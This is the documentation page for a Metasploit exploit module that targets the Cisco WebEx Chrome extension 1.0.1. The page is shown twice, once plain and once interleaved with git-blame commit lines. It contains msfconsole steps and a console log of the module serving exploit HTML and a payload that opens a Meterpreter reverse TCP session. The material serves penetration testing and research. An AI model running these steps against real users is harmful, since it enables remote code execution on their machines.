documentation/modules/exploit/windows/browser/cisco_webex_ext.md

## Vulnerable Application

Cisco WebEx is a suite of applications for online meeting organization and video conferencing.
Included in this suite are extensions for popular web browsers which ease use and provide supplemental
features.

Version 1.0.1 of the WebEx extension for Google Chrome contains a vulnerability which allows an
attacker to execute arbitrary commands on a target, which can lead to arbitrary remote code execution.

Cisco WebEx Chrome Extension 1.0.1 is known to be affected.

## Verification Steps

1. Start msfconsole
2. Do: ```use exploit/windows/browser/cisco_webex_ext```
3. Do: ```set SRVHOST [IP ADDRESS]```
4. Do: ```set SRVPORT [PAYLOAD NAME]```
5. Do: ```set URIPATH [ARBITRARY URI]```
6. Do: ```Choose a payload and set any specific options```
6. Do: ```run```, after a target browses to the generated URL, you should receive a session like the following:

## Scenarios

```
msf > use exploits/windows/browser/cisco_webex_ext
msf exploit(cisco_webex_ext) > set srvhost 10.6.0.151
srvhost => 10.6.0.151
msf exploit(cisco_webex_ext) > set srvport 4567
srvport => 4567
msf exploit(cisco_webex_ext) > set uripath not_a_very_good_meeting
uripath => not_a_very_good_meeting
msf exploit(cisco_webex_ext) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 10.6.255.229:4444
[*] Using URL: https://10.6.0.151:4567/not_a_very_good_meeting
[*] Server started.
msf exploit(cisco_webex_ext) > [*] 10.6.0.151       cisco_webex_ext - Got request: /not_a_very_good_meeting
[*] 10.6.0.151       cisco_webex_ext - From: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
[*] 10.6.0.151       cisco_webex_ext - Got request: /not_a_very_good_meeting/cwcsf-nativemsg-iframe-43c85c0d-d633-af5e-c056-32dc7efc570b.html
[*] 10.6.0.151       cisco_webex_ext - From: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
[*] 10.6.0.151       cisco_webex_ext - Sending exploit html ...
[*] 10.6.0.151       cisco_webex_ext - Got request: /not_a_very_good_meeting/qt3iFe8N
[*] 10.6.0.151       cisco_webex_ext - From:
[*] 10.6.0.151       cisco_webex_ext - Sending payload ...
[*] Sending stage (957487 bytes) to 10.6.255.229
[*] Meterpreter session 1 opened (10.6.255.229:4444 -> 10.6.255.229:57472) at 2017-01-26 13:27:28 -0600

msf exploit(cisco_webex_ext) >
```
module doc standardizations 2020-01-20 21:26:59 -05:00			`## Vulnerable Application`

add module doc and remove the word EXPLOIT from document title 2017-01-26 13:36:18 -06:00			`Cisco WebEx is a suite of applications for online meeting organization and video conferencing.`
			`Included in this suite are extensions for popular web browsers which ease use and provide supplemental`
			`features.`

			`Version 1.0.1 of the WebEx extension for Google Chrome contains a vulnerability which allows an`
			`attacker to execute arbitrary commands on a target, which can lead to arbitrary remote code execution.`

			`Cisco WebEx Chrome Extension 1.0.1 is known to be affected.`

			`## Verification Steps`

			`1. Start msfconsole`
move cisco_webex_ext to exploits/windows/browser/ 2017-01-27 16:59:20 -06:00			2. Do: ```use exploit/windows/browser/cisco_webex_ext```
add module doc and remove the word EXPLOIT from document title 2017-01-26 13:36:18 -06:00			3. Do: ```set SRVHOST [IP ADDRESS]```
			4. Do: ```set SRVPORT [PAYLOAD NAME]```
			5. Do: ```set URIPATH [ARBITRARY URI]```
			6. Do: ```Choose a payload and set any specific options```
			6. Do: ```run```, after a target browses to the generated URL, you should receive a session like the following:

module doc standardizations 2020-01-20 21:26:59 -05:00			`## Scenarios`
Update cisco_webex_ext doc 2017-01-27 15:36:57 -06:00
add module doc and remove the word EXPLOIT from document title 2017-01-26 13:36:18 -06:00			```
move cisco_webex_ext to exploits/windows/browser/ 2017-01-27 16:59:20 -06:00			`msf > use exploits/windows/browser/cisco_webex_ext`
add module doc and remove the word EXPLOIT from document title 2017-01-26 13:36:18 -06:00			`msf exploit(cisco_webex_ext) > set srvhost 10.6.0.151`
			`srvhost => 10.6.0.151`
			`msf exploit(cisco_webex_ext) > set srvport 4567`
			`srvport => 4567`
			`msf exploit(cisco_webex_ext) > set uripath not_a_very_good_meeting`
			`uripath => not_a_very_good_meeting`
			`msf exploit(cisco_webex_ext) > run`
			`[*] Exploit running as background job.`

			`[*] Started reverse TCP handler on 10.6.255.229:4444`
			`[*] Using URL: https://10.6.0.151:4567/not_a_very_good_meeting`
			`[*] Server started.`
			`msf exploit(cisco_webex_ext) > [*] 10.6.0.151 cisco_webex_ext - Got request: /not_a_very_good_meeting`
			`[*] 10.6.0.151 cisco_webex_ext - From: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36`
			`[*] 10.6.0.151 cisco_webex_ext - Got request: /not_a_very_good_meeting/cwcsf-nativemsg-iframe-43c85c0d-d633-af5e-c056-32dc7efc570b.html`
			`[*] 10.6.0.151 cisco_webex_ext - From: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36`
			`[*] 10.6.0.151 cisco_webex_ext - Sending exploit html ...`
			`[*] 10.6.0.151 cisco_webex_ext - Got request: /not_a_very_good_meeting/qt3iFe8N`
			`[*] 10.6.0.151 cisco_webex_ext - From:`
			`[*] 10.6.0.151 cisco_webex_ext - Sending payload ...`
			`[*] Sending stage (957487 bytes) to 10.6.255.229`
			`[*] Meterpreter session 1 opened (10.6.255.229:4444 -> 10.6.255.229:57472) at 2017-01-26 13:27:28 -0600`

			`msf exploit(cisco_webex_ext) >`
			```